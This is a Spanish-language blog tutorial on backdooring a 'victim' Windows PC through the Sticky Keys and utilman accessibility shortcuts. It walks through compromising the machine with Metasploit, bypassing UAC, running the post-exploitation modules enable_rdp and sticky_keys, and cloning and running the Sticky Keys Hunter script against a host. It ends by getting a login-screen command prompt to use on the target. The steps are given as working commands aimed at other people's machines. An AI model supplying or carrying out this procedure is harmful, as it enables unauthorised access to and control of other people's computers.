Accede a la puerta trasera de Sticky keys en PC Remotos con Sticky Keys Hunter

junio 3, 2016
1 Star2 Stars3 Stars4 Stars5 Stars (3 votos, promedio: 5,00 de 5)
Cargando…

Este bash script comprueba la disponibilidad de las sticky keys y la puerta trasera utilman. El script se conectará a un servidor RDP; enviará tanto las sticky keys como los disparadores utilman y capturas de pantalla del resultado.

¿Cómo funciona?

  • Se conecta a RDP mediante rdesktop
  • Envia shift 5 veces usando xdotool para desencadenar las puertas traseras en sethc.exe
  • Envia Windows+u usando xdotool para desencadenar las puertas traseras en utilman.exe
  • Toma pantallazos
  • Termina la conexión RDP

Primero debes hackear al PC víctima usando Metasploit (Tutorial How to Hack Remote PC)

Sáltate la protección de la víctima UAC PC (Tutorial Cómo saltarse la protección UAC)

Tras conseguir la sesión habilita la opción de escritorio remoto del PC mediante el siguiente exploit

msf > use post/windows/manage/enable_rdp
msf post(enable_rdp) > set session 2
msf post(enable_rdp) > exploit

 

stickykeys_bd_2

En el paso siguiente sustituye la tecla permanente con el símbolo del sistema mediante el siguiente exploit

msf > use post/windows/manage/stickey_keys
msf post(stickey_keys) > set session 2
msf post(stickey_keys) > exploit

 

stickykeys_bd_3

Ahora clona el repositorio Sticky Keys Hunter desde GitHub, para hacerlo escribe:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

 

stickykeys_bd_4

Para configurar la exploración de un único host: ./stickyKeysHunter.sh 192.168.0.120

 

stickykeys_bd_5

Se abrirá una ventana emergente, como se muestra a continuación

 

stickykeys_bd_6

A continuación, pulsa 5 veces la tecla shift en la pantalla de inicio de sesión para que se abra una linea de comandos

stickykeys_bd_7

A partir de aquí se puede hacer cualquier cosa en el PC víctima a través de línea de comandos. En la imagen estoy utilizando el comando net user para ver la lista de cuentas activas

stickykeys_bd_8

 

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *